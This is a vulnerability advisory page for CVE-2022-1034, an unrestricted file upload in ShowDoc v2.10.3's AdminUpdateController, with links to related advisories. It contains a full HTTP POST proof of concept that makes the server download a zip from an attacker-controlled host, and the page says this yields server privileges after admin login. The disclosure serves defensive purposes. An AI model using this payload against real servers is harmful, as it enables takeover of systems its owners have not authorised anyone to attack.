Lucene search
MetastorD205C489-3266-4AC4-ACB7-C8EE570887F7HistoryMar 20, 2022 - 7:41 a.m.
There is a Unrestricted Upload of File vulnerability in ShowDoc v2.10.3
2022-03-2007:41:31
metastor
www.huntr.dev
16
showdoc v2.10.3
unrestricted upload
adminupdatecontroller
file vulnerability
obtain server privileges
EPSS
0.001
Percentile
41.1%
Description
There is a Unrestricted Upload of File vulnerability in AdminUpdateController.class.php in ShowDoc v2.10.3
Proof of Concept
POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin
new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip
Impact
After the attacker login to the admin panel, the vulnerability can be used to obtain server privileges.
Related
osv
osv
CVE-2022-1034
2022-03-22 08:15:07
Unrestricted Upload of File with Dangerous Type in ShowDoc
2022-03-23 00:00:23
cvelist
cvelist
cve
cve
CVE-2022-1034
2022-03-22 08:15:07
prion
prion
Unrestricted file upload
2022-03-22 08:15:00
nvd
nvd
CVE-2022-1034
2022-03-22 08:15:07
veracode
veracode
Unrestricted File Upload
2022-03-23 05:00:26
github
github
Unrestricted Upload of File with Dangerous Type in ShowDoc
2022-03-23 00:00:23